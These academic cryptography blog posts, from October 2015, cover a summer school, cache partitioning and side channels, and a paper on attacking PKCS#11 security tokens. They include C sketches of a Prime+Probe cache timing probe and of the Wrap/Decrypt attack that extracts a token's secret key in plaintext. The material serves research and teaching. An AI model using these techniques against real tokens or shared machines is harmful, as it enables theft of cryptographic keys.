## Tuesday, October 27, 2015

### Sardinia eCrypt School, October 2015

As I stood in the sweltering heat, under the burning light from above, with the hustle and bustle of busy bodies rushing all around me, I thought to myself: "in about three hours I'll finally get through Stansted airport security".

One of the reasons I applied for a PhD at the University of Bristol was to travel: to travel all around the world attending conferences, networking with other academics in my field and collaborating on relevant pieces of work. However, I hadn't anticipated that I would arrive at Bristol and meet my supervisors (Elisabeth Oswald and Daniel Page), only for them to say "thank goodness you're here, now pack your bags and head to Sardinia for a week".

I didn't argue.

The school I'm referring to is the "School on Design and Security of Cryptographic Algorithms and Devices", and this year it was co-sponsored by the International Association for Cryptologic Research (IACR). Roughly 80 academics and professionals from all around the globe attended, many of whom were new PhD students (like me), and a few of whom were seasoned crypto school veterans. As a newbie I experienced the excitement of meeting all these new faces and getting to know them over a few glasses of wine (the magnificent hotel resort was very generous with its distribution of wine, particularly to my table).

The school took the form of a crash course in many different aspects of cryptography, focusing on covering a lot of ground with introductory lectures. For my first blog post I really wanted to focus on one particular talk, but after attending them all it became clear that I had quite a few favourites; for their content, Benedikt Gierlichs' "Introduction to Implementation Attacks" and Josep Balasch's "Introduction to Fault Attacks" were fascinating. With little background knowledge of practical attacks on embedded security, I was shocked to see just how easily one can manipulate theoretically secure devices, simply by making minor alterations to the embedded circuit (see the slides from Benedikt Gierlichs' "Introduction to Implementation Attacks" for more detail).

## Thursday, October 8, 2015

### Caches: a Computer Science 101 explanation

The so-called memory wall has long been, and remains, a thorn in the side of computer architecture. The issue is simple: modern processors can execute instructions at a high rate (magnified by superscalar, SMT, multi-core and whatever else), but are effectively limited by the (relatively) low performance of the memories they are attached to. The sticking plaster over this issue, which has worked fairly well so far at least, is the memory hierarchy. Again put simply, in the absence of an ideal, infinitely large and infinitely fast memory, we're stuck with less ideal alternatives. So, as a compromise, we try to get the best out of each technology we do have: this results in the memory hierarchy, where we have, for example, some small, fast registers at one end and a large, slow memory at the other. As long as we retain the working set towards the faster end of the hierarchy (which the principle of locality suggests we can), performance approaches the ideal.

Somewhere in the hierarchy between registers and memory, we typically place a cache (or several levels of them). A given cache will have less capacity than main memory, but can be faster as a consequence; using control logic that transparently capitalises on locality of reference, most accesses are (in theory) satisfied by the faster cache rather than the slower memory. Or, if you just care about software, caches pull off a kind of magic trick: the program executes faster, and does so "for free" in the sense that the cache is transparent, so the program needn't do anything special. Or at least it does on average: one can write some interesting programs to exercise the worst-case behaviour, which reveal the real, and quite alarmingly sized, performance gap that caches paper over.
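To make that gap concrete, here's a minimal sketch in C (assuming a POSIX system for `clock_gettime`; sizes and strides are illustrative). It sums the same 64 MiB of memory twice: once sequentially, so the hardware can exploit spatial locality, and once in page-sized strides, which defeats it. Both walks perform exactly the same number of accesses, yet on a typical machine the strided one runs several times slower.

```c
/* Minimal sketch: the same work, cache-friendly vs cache-hostile.
   Assumes POSIX clock_gettime; compile with e.g. `cc -O2 demo.c`. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define N ((size_t)1 << 26) /* 64 MiB */

/* Touch every byte of a[], visiting them `stride` apart. */
static double walk(unsigned char *a, size_t stride) {
    struct timespec t0, t1;
    volatile unsigned long sum = 0; /* volatile: keep the loads alive */
    clock_gettime(CLOCK_MONOTONIC, &t0);
    for (size_t s = 0; s < stride; s++)
        for (size_t i = s; i < N; i += stride)
            sum += a[i];
    clock_gettime(CLOCK_MONOTONIC, &t1);
    (void)sum;
    return (t1.tv_sec - t0.tv_sec) + (t1.tv_nsec - t0.tv_nsec) / 1e9;
}

int main(void) {
    unsigned char *a = malloc(N);
    if (!a) return 1;
    for (size_t i = 0; i < N; i++) a[i] = (unsigned char)i;
    printf("sequential walk:  %.3f s\n", walk(a, 1));
    printf("stride-4096 walk: %.3f s\n", walk(a, 4096));
    free(a);
    return 0;
}
```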

### Partitioned caches, CAT and side-channel attacks

After years of increasing cache sizes, and tweaking their organisation and control strategies, Intel have now included something called Cache Allocation Technology (CAT) in their Xeon processors: there's a great write-up here, although the original white paper doesn't really do justice to the vast range of literature in this area. The idea is that the cache can be partitioned, or divided into protected regions, with the goal of improving performance. For a server delivering a service with variable demand, for example, it makes sense to allow forms of variable resource allocation to match. Given it is transparent to your programs, by design, you might not think of the cache as a resource of this type. But it is, of course: processes share, and so compete for, space in (any level of) the cache, so by allowing protected allocation of said space via partitioning, one can eliminate said contention. For example, the OS might decide to allocate a large(r) region to some high-priority process and a small(er) region to another process deemed lower-priority; the former might execute faster as a result, since more of its working set is resident.
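For a flavour of what driving such a partition looks like in practice: on recent Linux kernels, CAT is exposed through the resctrl filesystem. Below is a minimal sketch in C, assuming resctrl is mounted at /sys/fs/resctrl on a machine with a single L3 domain; the group name, way-mask and PID are all illustrative.

```c
/* Illustrative sketch: carve out an L3 partition via Linux resctrl
   (kernel 4.10+; requires root and a mounted /sys/fs/resctrl).
   Group name, mask and PID are made up for the example. */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(void) {
    /* Creating a directory creates a new cache-allocation group. */
    mkdir("/sys/fs/resctrl/lowpri", 0755);

    /* Restrict the group to four L3 ways on cache domain 0; the
       value is a contiguous bitmap of cache ways. */
    FILE *f = fopen("/sys/fs/resctrl/lowpri/schemata", "w");
    if (!f) return 1;
    fprintf(f, "L3:0=f\n");
    fclose(f);

    /* Assign a (hypothetical) low-priority process to the group. */
    f = fopen("/sys/fs/resctrl/lowpri/tasks", "w");
    if (!f) return 1;
    fprintf(f, "%d\n", 1234);
    fclose(f);
    return 0;
}
```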

This is interesting from a security perspective, because when any resource is shared between two processes, there is potential for leakage of information from one process to another. For the specific case of caches there's again a huge amount of literature from the side-channel community, but the (fairly) recent work of Eisenbarth, Sunar et al. goes a long way toward summing up one strand of the wider problem. The good news is that wrt. the Last Level Cache (LLC), which is problematic in the sense that it's a target for cross-VM attacks in the context of cloud computing, CAT might offer a countermeasure. Depressingly (for me), this is a sort of bitter-sounding "I told you so" stemming from admittedly quite speculative work I did 10 years ago. It's also depressing that that was 10 years ago, but that's another story.
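The kind of LLC attack at issue typically works along Prime+Probe lines: fill a cache set with your own lines, let the victim run, then time re-accesses to see which lines were evicted. The sketch below shows just the measurement core, assuming an x86 machine and GCC/Clang; the associativity and stride are illustrative placeholders, and a real LLC attack would additionally need to construct eviction sets that account for the cache's slices.

```c
/* Sketch of the Prime+Probe measurement step (x86, GCC/Clang).
   WAYS and STRIDE are assumptions for illustration; a real LLC
   attack must build per-slice eviction sets instead. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h> /* __rdtscp */

#define WAYS   8         /* assumed associativity of the target set */
#define STRIDE (1 << 16) /* assumed spacing mapping to the same set */

static inline uint64_t timed_load(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p; /* the load being timed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    uint8_t *buf = aligned_alloc(4096, (size_t)WAYS * STRIDE);
    if (!buf) return 1;

    /* Prime: fill the target set with our own lines. */
    for (int w = 0; w < WAYS; w++)
        buf[w * STRIDE] = 1;

    /* ... victim runs here; touching the same set evicts our lines ... */

    /* Probe: time each re-access; evictions show up as slow misses. */
    for (int w = 0; w < WAYS; w++)
        printf("way %d: %llu cycles\n", w,
               (unsigned long long)timed_load(&buf[w * STRIDE]));

    free(buf);
    return 0;
}
```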

### Knee-jerk conclusions

I said "might offer" carefully, though, because although Intel may have bought into the idea of exposing control over shared resources, this is down to a focus on non-security metrics such as performance. That focus seems to undermine the value of CAT for security: for example, the technical documentation says that "power management may override CAT settings". It might be hard to mount a PoC, but it at least seems feasible that an attacking process might force the security-unaware power management system to abandon CAT, then mount an LLC-based attack as normal.

I've only really started to look at the technical detail, so it's too soon to jump to strong conclusions, but, to me, projects like Sanctum and CHERI offer more considered (albeit more invasive) approaches to isolated, compartmentalised instruction execution; in contrast, and at first glance at least, CAT seems more like another bolt-on, and so a missed opportunity. Given the effort involved in deploying a technology like CAT at all, it seems a shame that security is again somewhere down the metric pecking order: Intel could probably have done us all a favour by helping to solve the underlying security problem (and, to be fair, there may well be ways of using CAT to do so), but instead opted to target (more saleable) performance again.

## Monday, October 5, 2015

### Study Group: Attacking PKCS#11 Tokens

This year, the Bristol Cryptography Group is doing something slightly different with our weekly study groups. Each member of the group has been tasked with talking about "the best paper [they've] read this year".

This means that the papers we're presenting won't all be particularly recent, but they will (hopefully) be interesting and exciting bits of work.

I kicked things off last week by talking about Attacking and Fixing PKCS#11 Tokens [1], which is from CCS '10. I started my PhD just over a year ago and this was one of the first papers I read. It has stuck with me as a model of good scientific writing: the exposition is very clear, the content is cleanly presented and one doesn't need to have a huge amount of prerequisite knowledge in order to follow the methodology. More importantly, even a non-specialist reader can understand the main result of the paper and appreciate its significance.

In brief: the authors used a formal, symbolic model to analyse a number of commercial security devices implementing a standard key management API called PKCS#11. Of the 17 tokens tested, "9 were vulnerable to attack, while the other 8 had severely restricted functionality." As I said, one doesn't need to have a PhD in Cryptography in order to get the point: real security devices were seriously flawed. In fact, they allowed you to obtain secret keys in plaintext.

A security token is designed to provide access to sensitive material in insecure environments. Your company might want you to access their (sensitive) system from your (potentially insecure) house, so they give you a USB stick (or similar) to bridge the gap. The token does the cryptography for you, so your personal laptop, which could be infested with malware, can't directly access the secret keys stored on the token. Instead, there's an API - an interface - between your machine and the token. Moreover, the token is (supposedly) tamper-resistant, so one cannot learn the key values by breaking open the hardware.

The most popular API for security tokens is PKCS#11, which is described in a vast document that was first published in the mid '90s and has been updated very little since then. The trouble is, while the document itself is public [2], the implementation of its contents within each security token is typically unknown to all but the token's manufacturer. So, while attacks on the standard had been known for quite some time prior to the publication of this paper [3, 4], it was unclear whether these attacks could actually be mounted on real devices. Perhaps the manufacturers had been smarter than those who had written the standard and had avoided the many pitfalls by adding extra safeguards?

Of course not. Compliance trumps security every time.

The authors of the paper built a tool that reverse-engineers a token to deduce its functionality, builds a formal model to represent this functionality, finds an attack in the model and then attempts to implement this attack on the real device. While the formal model is quite sophisticated, the attacks are not. Of the five presented in the paper, three are obvious non-compliance with the standard (such as the token just handing you a secret key in plaintext if you ask for it!) and the other two are versions of the famous Wrap/Decrypt attack first found in 2003 [3]. The only tokens that were not vulnerable to these basic attacks were those that disabled key wrapping (encrypting a key under another key) altogether, but this is an important feature of key management APIs.
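To give a flavour of how simple the Wrap/Decrypt attack is at the API level: if a token allows the same key to be used both for wrapping other keys (CKA_WRAP) and for decrypting arbitrary data (CKA_DECRYPT), extracting a "sensitive" key takes two calls. Here's a minimal sketch against the Cryptoki C interface, assuming an open session and a pkcs11.h header configured for your platform; the handles, mechanism and buffer sizes are illustrative and error handling is omitted.

```c
/* Sketch of the Wrap/Decrypt attack [3] against the PKCS#11 C API.
   Assumes hK has both CKA_WRAP and CKA_DECRYPT set; handles and
   mechanism are illustrative, error handling omitted. */
#include <pkcs11.h>

void wrap_decrypt_attack(CK_SESSION_HANDLE session,
                         CK_OBJECT_HANDLE hK,        /* attacker-usable key  */
                         CK_OBJECT_HANDLE hSecret) { /* sensitive key to steal */
    CK_MECHANISM mech = { CKM_DES3_ECB, NULL_PTR, 0 };
    CK_BYTE wrapped[256], plain[256];
    CK_ULONG wrappedLen = sizeof wrapped, plainLen = sizeof plain;

    /* Step 1: wrap the sensitive key under hK -- a legitimate
       key-management operation, so the token permits it. */
    C_WrapKey(session, &mech, hK, hSecret, wrapped, &wrappedLen);

    /* Step 2: treat the wrapped blob as ordinary ciphertext and
       decrypt it under the same key hK. */
    C_DecryptInit(session, &mech, hK);
    C_Decrypt(session, wrapped, wrappedLen, plain, &plainLen);

    /* plain now holds the raw value of the "sensitive" key. */
}
```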

It is, in fact, possible to do key wrapping in a secure way, but it requires great care. There has been some research in this direction since 2010, including my own ongoing work, but I don't have space to elaborate on this here.

For me, the take-home message from this paper is that, if you don't prove the security of your security device, it's probably insecure. This insecurity makes for fun academic papers, but is also rather worrying when your device is widely used in the real world.

[1] - http://dl.acm.org/citation.cfm?doid=1866307.1866337
[2] - http://docs.oasis-open.org/pkcs11/pkcs11-base/v2.40/pkcs11-base-v2.40.pdf
[3] - Jolyon Clulow, "On the Security of PKCS#11", CHES 2003